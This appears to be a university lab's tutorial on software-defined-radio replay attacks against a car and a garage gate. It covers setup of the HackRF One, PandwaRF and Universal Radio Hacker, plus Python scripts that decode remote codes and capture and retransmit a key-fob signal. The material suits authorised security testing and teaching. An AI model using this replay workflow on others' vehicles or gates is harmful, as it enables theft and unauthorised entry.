SDR-RelayAttacks

From Embedded Lab Vienna for IoT & Security

Summary

This documentation is about SDR (software defined radio) and relay attacks. It explains both terms and shows how some IoT devices can be attacked with an SDR: the remote's radio signal is captured and later transmitted again to the receiver. It also gives detailed information about the devices we used, how they were set up and what else is required.

Requirements

We used three different SDR devices for the penetration testing of a car and a garage gate.

Hardware

  • HackRF-One
  • PandwaRF
  • Nooelec SDR (receive only, no transmission possible)
  • Car
  • Garage gate

Software

  • Computer with Kali Linux installed natively.
  • License for PandwaRF.
  • Universal Radio Hacker.
  • PandwaRF app for Android (the phone must run a current Android version).

In order to complete these steps, you must have followed Some Other Documentation before.

Description

Pentesting with PandwaRF

Step 1

  1. Install the PandwaRF app on your Android phone.
  2. Unpack the device.
  3. Attach the antennas. (Never transmit with an SDR that has no antenna connected: the reflected power can damage the transmit amplifier.)
  4. Connect the PandwaRF to your phone via USB-C.
  5. Open the app.


Step 2

  1. The device should connect to the app automatically. If it does not, connect it manually in the search tab.
  2. Once connected, use the spectrum analyser to find the frequency on which the target transmits (press the remote while watching the spectrum). Select that frequency before capturing, otherwise you will not see the signal you are after.
  3. In the Rx/Tx tab you can capture the signal you want to analyse; the app can also auto-detect a signal while it is being sent. PandwaRF shows the captured data in hex or in binary, which you can analyse afterwards.
  4. To transmit a captured signal you need to buy a "Kaiju" license. Kaiju is an online tool for analysing rolling codes and generating new ones; it is mainly used to attack systems that use rolling codes.
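The hex or binary dump is only useful once you know whether the remote sends the same code on every press. The following Python script is an added example for this page; it is not code from the original documentation, from PandwaRF or from Universal Radio Hacker. It turns a raw on/off-keyed amplitude envelope into bits using a pulse-width (PWM) convention, renders them the way a hex view would, and compares two presses of the same button: identical frames mean a fixed code that a plain replay will open, differing frames of the same length mean a rolling code. The pulse widths, the PWM convention (long pulse = 1, short pulse = 0) and both captures are constructed for the example; take the real widths from the signal view of your tool.

```python
"""Added example (not code from the original page or from PandwaRF/URH):
decode an on/off-keyed envelope into PWM bits and tell fixed from rolling
codes by comparing two presses. Pulse widths and captures are constructed."""

SHORT = 4     # samples per short pulse (assumption; measure in the signal view)
LONG = 12     # samples per long pulse (assumption)
GAP = 40      # silence after a frame
THRESH = 0.5  # envelope level above which the carrier counts as "on"


def build_frame(bits, noise=0.05):
    """Fabricate an envelope for a PWM frame: '1' = long high + short low,
    '0' = short high + long low (PT2262-style). Test input only."""
    samples = []
    for b in bits:
        high, low = (LONG, SHORT) if b == '1' else (SHORT, LONG)
        samples += [1.0 - noise] * high + [noise] * low
    return samples + [noise] * GAP


def runs(samples, thresh=THRESH):
    """Collapse the envelope into (level, length) runs; level 1 = carrier on."""
    out = []
    for s in samples:
        lvl = 1 if s > thresh else 0
        if out and out[-1][0] == lvl:
            out[-1][1] += 1
        else:
            out.append([lvl, 1])
    return [tuple(r) for r in out]


def decode_pwm(samples, short_w=SHORT, long_w=LONG):
    """Return the frame as a bit string: each carrier-on pulse is one bit,
    decided by whether its width is nearer short_w or long_w. Pulses that fit
    neither width (glitches, noise spikes) are dropped instead of guessed."""
    mid = (short_w + long_w) / 2
    bits = []
    for lvl, n in runs(samples):
        if lvl == 1 and short_w // 2 <= n <= long_w * 2:
            bits.append('1' if n > mid else '0')
    return ''.join(bits)


def bits_to_hex(bits):
    """Pad to a byte boundary and render like PandwaRF's hex view."""
    if not bits:
        return ''
    padded = bits + '0' * (-len(bits) % 8)
    return f'{int(padded, 2):0{len(padded) // 4}X}'


def classify_presses(press_a, press_b):
    """Same frame on both presses = fixed code (a replay opens it);
    different frames of the same length = rolling code (a replay is rejected)."""
    a, b = decode_pwm(press_a), decode_pwm(press_b)
    if not a or not b or len(a) != len(b):
        return 'undecodable'
    return 'fixed (replayable)' if a == b else 'rolling (replay will fail)'


# Constructed captures: a 12-bit fixed-code gate remote pressed twice, and a
# fob whose 8-bit counter field increments between presses.
GATE_PRESS_1 = build_frame('101100111010')
GATE_PRESS_2 = build_frame('101100111010')
FOB_PRESS_1 = build_frame('0110' + '00000001')
FOB_PRESS_2 = build_frame('0110' + '00000010')

if __name__ == '__main__':
    frame = decode_pwm(GATE_PRESS_1)
    print('gate frame:', frame, '=', bits_to_hex(frame))
    print('gate:', classify_presses(GATE_PRESS_1, GATE_PRESS_2))
    print('fob :', classify_presses(FOB_PRESS_1, FOB_PRESS_2))
```

A real capture is noisier than the constructed one: set THRESH from the histogram of your envelope rather than at 0.5, and derive SHORT and LONG from the two clusters of pulse widths that runs() reports before trusting the decoded bits.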

Pentesting with HackRF One

Step 1

  1. Set up a laptop with Kali Linux installed natively. If you want to dual-boot on your own machine, use the instructions below.

Dual boot on a Windows machine

  1. You need a USB stick with at least 8 GB of storage.
  2. Download the Kali image from the official website.
  3. Flash the image onto the USB stick with a tool such as Etcher to make it bootable.
  4. Enter the BIOS/UEFI setup and disable Secure Boot if it is enabled: Secure Boot only starts boot loaders signed with a key the firmware trusts, and the Kali boot loader is not, so the stick would refuse to boot. Then move "USB" to the top of the boot priority list.
  5. For further information follow the instructions on the official website.

Step 2

  • Driver installation for HackRF One on Windows
  1. Download Zadig and use it to install the WinUSB driver for the HackRF.
  2. Zadig is only available for Windows; on Linux no separate driver is needed.
  • Set up HackRF on Linux
  1. sudo apt-get update
  2. sudo apt-get -y install hackrf
  3. Plug in the HackRF and check that hackrf_info lists the board (serial number and firmware version); if it does not, the USB connection or the udev permissions are the problem, not the software.

Install Universal Radio Hacker on the Linux machine

  • First method (pip; note that installing as root with pip can overwrite distribution packages, a user install or a virtual environment avoids this)
  1. sudo python3 -m pip install --upgrade pip
  2. sudo python3 -m pip install urh
  • Second method (Kali package)
  1. sudo apt -y install urh

  • Third method (from source)
  1. git clone https://github.com/jopohl/urh
  2. cd urh
  3. python3 setup.py install
  • Start Universal Radio Hacker with the command "urh"
    • In the device settings:
    1. Choose HackRF as the device.
    2. Enter the frequency you found with the spectrum analyser.
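Universal Radio Hacker drives the HackRF from its GUI, but the same capture-and-replay can be scripted with hackrf_transfer from the hackrf package installed above. The following Python script is an added example for this page, not code from the original documentation or from the HackRF project. It builds the hackrf_transfer command lines for recording a burst to an 8-bit IQ file and for transmitting that file again, validates the parameters against the HackRF One's specified ranges (1 MHz to 6 GHz, 2 to 20 MS/s) and hackrf_transfer's gain steps before anything is sent, and only runs the commands when the tool is actually installed. The 433.92 MHz centre frequency and the gain values are assumptions; read the real frequency off the spectrum analyser first.

```python
"""Added example, not code from the original page or from the HackRF project:
record one key-fob burst with hackrf_transfer and replay the same IQ file.
433.92 MHz and the gain values are assumptions for an EU fob; read the real
centre frequency off the spectrum analyser first."""
import shutil
import subprocess

FREQ_MIN_HZ, FREQ_MAX_HZ = 1_000_000, 6_000_000_000   # HackRF One tuning range
RATE_MIN_HZ, RATE_MAX_HZ = 2_000_000, 20_000_000       # HackRF One sample rates

# Gain steps accepted by hackrf_transfer: (-l) LNA 0..40 in steps of 8,
# (-g) RX VGA 0..62 in steps of 2, (-x) TX VGA 0..47 in steps of 1.
GAINS = {'lna': (40, 8), 'vga': (62, 2), 'txvga': (47, 1)}


def _check(freq_hz, rate_hz, **gains):
    """Reject parameters the hardware cannot do instead of letting
    hackrf_transfer round or refuse them at run time."""
    if not FREQ_MIN_HZ <= freq_hz <= FREQ_MAX_HZ:
        raise ValueError(f'frequency {freq_hz} Hz outside HackRF range')
    if not RATE_MIN_HZ <= rate_hz <= RATE_MAX_HZ:
        raise ValueError(f'sample rate {rate_hz} Hz outside HackRF range')
    for name, value in gains.items():
        top, step = GAINS[name]
        if not 0 <= value <= top or value % step:
            raise ValueError(f'{name} gain {value} dB: must be 0..{top} in steps of {step}')


def rx_args(freq_hz, rate_hz, seconds, out_path, lna=32, vga=20, amp=False):
    """hackrf_transfer command that records `seconds` of 8-bit IQ to out_path.
    -n is a sample count, so it is derived from the rate, not given in seconds."""
    _check(freq_hz, rate_hz, lna=lna, vga=vga)
    args = ['hackrf_transfer', '-r', out_path, '-f', str(freq_hz), '-s', str(rate_hz),
            '-n', str(rate_hz * seconds), '-l', str(lna), '-g', str(vga)]
    return args + (['-a', '1'] if amp else [])


def tx_args(freq_hz, rate_hz, in_path, txvga=20, amp=False):
    """hackrf_transfer command that replays an IQ file. Use the rate the file
    was captured with: a mismatch stretches or squeezes the burst in time and
    the receiver will not decode it."""
    _check(freq_hz, rate_hz, txvga=txvga)
    args = ['hackrf_transfer', '-t', in_path, '-f', str(freq_hz), '-s', str(rate_hz),
            '-x', str(txvga)]
    return args + (['-a', '1'] if amp else [])


def run(args):
    """Run the command when the HackRF tools are installed; otherwise return
    the command line so the script is still usable as a dry run."""
    if shutil.which(args[0]) is None:
        return ' '.join(args)
    subprocess.run(args, check=True)
    return None


if __name__ == '__main__':
    FOB_FREQ = 433_920_000   # assumption: EU ISM-band fob; confirm on the spectrum analyser
    RATE = 2_000_000         # plenty for a narrowband OOK/ASK remote
    print(run(rx_args(FOB_FREQ, RATE, 3, 'fob.iq')))   # press the button while this records
    input('Antenna attached? Press Enter to replay fob.iq ...')  # never transmit without one
    print(run(tx_args(FOB_FREQ, RATE, 'fob.iq')))
```

Start with the transmit gain low and the amplifier off; the receiver is usually a few metres away and a saturated front end decodes nothing. Only transmit on frequencies and with power levels you are licensed for, against equipment you own or are authorised to test.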

Nooelec NESDR SMArt – receive only

Step 1

On Windows, install the driver with Zadig (detailed information in the HackRF One section). On Linux, install the rtl-sdr package instead (sudo apt -y install rtl-sdr) and make sure the kernel's DVB-T driver (dvb_usb_rtl28xxu) is not claiming the dongle, otherwise the SDR software cannot open it.

Step 2

Select RTL-SDR as the "Device" in the device settings, enter the frequency, and you are ready to receive signals.

Used Hardware

  • HackRF One
  • PandwaRF
  • Nooelec SDR

Conclusion

We were able to receive signals with all three software defined radios. However, the HackRF One was the only device with which we could also transmit. It should be possible to transmit with the PandwaRF as well, but we struggled with the Kaiju license that the transmission process requires. We therefore achieved our project goals with the HackRF One.
